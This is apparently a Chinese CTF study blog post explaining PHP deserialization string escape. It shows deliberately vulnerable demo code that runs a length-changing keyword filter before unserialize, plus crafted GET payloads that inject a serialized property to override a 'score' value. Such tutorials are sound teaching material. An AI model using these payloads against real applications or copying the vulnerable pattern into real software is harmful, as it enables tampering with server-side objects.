php反序列化字符串逃逸

最新推荐文章于 2024-03-13 16:52:52 发布
最新推荐文章于 2024-03-13 16:52:52 发布
阅读量439 收藏 1
点赞数 3
分类专栏: php反序列化 文章标签: php ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/115873284
版权

最近经常碰到反序列化改变长度的逃逸问题,写篇笔记记一下。
在反序列化前,若对序列化的字符串进行一些替换关键字操作,如果改变了长度,则会导致一些安全问题。

在讨论这个前得先理解php反序列化时的截断问题,举例:

<?php
$a = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:4:"defg";}';
$b = 'a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:5:"qwert";};i:2;s:4:"defg";}';
var_dump(unserialize($a));
echo "<br>";
var_dump(unserialize($b));
?>

结果:
在这里插入图片描述
可以看到$b中因为前部分a:3:{i:0;s:3:"123";i:1;s:3:"abc";i:2;s:5:"qwert";}已经满足反序列化需求,所以后部分被丢弃。
了解这个之后,就可以继续我们的讨论。

替换后长度变长。

<?php
function safe($str){
    return preg_replace('/k/', 'no', $str);
}
class User
{
    public $name;
    public $score;
}
    $o  = new User();
    $name = $_GET['name'];
    $o->name = $name;
    $o->score = '100';
    $str1 = serialize($o);
    echo $str1.'<br>';
    var_dump(unserialize($str1));
    echo '<br>';
    $str2 = safe($str1);
    echo $str2.'<br>';
    var_dump(unserialize($str2));
    echo '<br>';

上面的源码中score不可控,利用逃逸我们可以控制他的值。
上面的safe函数将get获取的name参数中关键字k替换成no,则每传入一个k长度加长1。
用get获取name参数
?name=fmyyykkkkkkkkkkkkkkkkkkkkkkkkk";s:5:"score";s:3:"888";}
结果:
在这里插入图片描述
可以看到,替换前score的值是100,替换后就变成了了888。
解释:
?name=fmyyykkkkkkkkkkkkkkkkkkkkkkkkk";s:5:"score";s:3:"888";}
在这个字符串中,后部分";s:5:"score";s:3:"888";}长度为25,所以前面构造25个k,这样替换后变成25个no,长度增加了25,将这部分挤出,
序列化字符串变成了:
O:4:"User":2:{s:4:"name";s:55:"fmyyynonononononononononononononononononononononononono";s:5:"score";s:3:"888";}";s:5:"score";s:3:"100";}
结合上面说过的截断问题,原来的score值被挤出,所以只要构造正确,本来不可控的score就会被我们控制。

替换后变长度减少。

差不多的原理

<?php
function safe($str){
    return preg_replace('/k/', '', $str);
}
class User
{
    public $name;
    public $age;
    public $score;
}
$o  = new User();
$name = $_GET['name'];
$o->name = $name;
$age = $_GET['age'];
$o->age = $age;
$o->score = '100';
$str1 = serialize($o);
echo $str1.'<br>';
var_dump(unserialize($str1));
echo '<br>';
$str2 = safe($str1);
echo $str2.'<br>';
var_dump(unserialize($str2));
echo '<br>';

上面的源码中,User类中有name,age,score三个属性,name和age是我们可控的,score不可控,我们要利用逃逸控制score的值。
传入参数
?name=kkkkkkkkkkkkkkkkkkkkkkk&age=12345";s:5:"score";s:3:"888";s:2:"ab";s:2:"sb";}
在这里插入图片描述
可以看到,score的值改变了。
解释:
原序列化字符串:
O:4:"User":3:{s:4:"name";s:23:"kkkkkkkkkkkkkkkkkkkkkkk";s:3:"age";s:48:"12345";s:5:"score";s:3:"888";s:2:"ab";s:2:"sb";}";s:5:"score";s:3:"100";}
把k变成空后
O:4:"User":3:{s:4:"name";s:23:"(";s:3:"age";s:48:"12345)";s:5:"score";s:3:"888";s:2:"ab";s:2:"sb";}";s:5:"score";s:3:"100";}
因为k被置换为空 但 s:23还在,会包含后面的23个字符,也就是括号里面的字符串(括号不算,为了方便理解加上去的)
但User类有三个属性,所以得在加一个任意属性才能满足反序列化,例如这里加的s:2:"ab";s:2:"sb",即属性ab值为sb。

总结

具体题目具体分析,如果题目中的键名可控的话,构造会被替换的键名也能进行逃逸。

fmyyy1
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化--字符串逃逸
YkingH的博客
03-14 5080
php反序列化字符串逃逸 PHP反序列化字符串逃逸,一共分有两种情况,情况一:过滤后字符串变多,情况二:过滤后字符变少(本篇文章默认已有反序列化相关知识基础) 过滤后字符串变多 以ctfshow-web262为例讲解: error_reporting(0); class message{ public $from; public $msg; public $to; public $token='user'; public function __construct(
PHP反序列化字符串逃逸
Elite的博客
12-23 403
帮助网安小白快速理解反序列化字符串逃逸原理
php反序列化逃逸1
08-03
}结束,后的字符串不影响正常的反序列化php反序列化逃逸知识点 - 属性逃逸般在数据先经过次 serialize 再经过 unserialize,在这个中间反序
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
PHP 反序列化字符串逃逸
On_the_road_TJJ的博客
09-06 228
PHP反序列化字符串逃逸,个人理解。
PHP反序列化-字符逃逸
bin789456的博客
08-13 410
写在前面 字符逃逸是在反序列化的基础之上进行的,如果你不是很清楚反序列化漏洞,可以点击下方: [超链接] 摘要 普通PHP反序列化漏洞是因为用户对反序列化过程可控造成的魔法方法弹出导致的漏洞,字符逃逸不仅可以在普通反序列化漏洞之上 ...
PHP反序列化字符逃逸
xiao_he0123的博客
03-16 667
PHP序列化和反序列化前言一、PHP序列化(serialize)二、PHP反序列化(unserialize)三、魔幻函数四、PHP反序列化字符逃逸1.替换修改后导致序列化字符串变长2.替换之后导致序列化字符变短 前言 一、PHP序列化(serialize) 序列化就是将变量或者对象转换为字符串的过程 #序列化结果: o:1:"A":2:{s:4:"name";s:4:"aaaa";s:4:"pass";s:6:"123456";} //o 即object简写的对象 //1 对象的字符数(这里对象是后面
php反序列化字符逃逸
leekos的博客,分享web安全相关知识~
01-04 1201
php反序列化字符逃逸
php反序列化学习——字符串逃逸
最新发布
m0_73756016的博客
03-13 993
如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:4:"pass";}就会结束 就相当于后面s:1:"b";s:4:"pass";
PHP反序列化字符逃逸详解
蚁景网安学院
08-24 422
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
php 反序列化逃逸
qq_45570082的博客
04-28 739
php反序列化逃逸 前提知识 PHP反序列化时,底层代码是以;作为字段的分隔,以}作为结尾(数组、对象等类型);反序列化时,结尾后的字符串会被忽略掉,例如: php > print_r(serialize([1])); a:1:{i:0;i:1;} php > print_r(unserialize('a:1:{i:0;i:1;}sdasda')); Array ( [0]...
fastjson反序列化字符串数组
03-03
下面是一个示例代码,演示了如何使用Fastjson反序列化字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值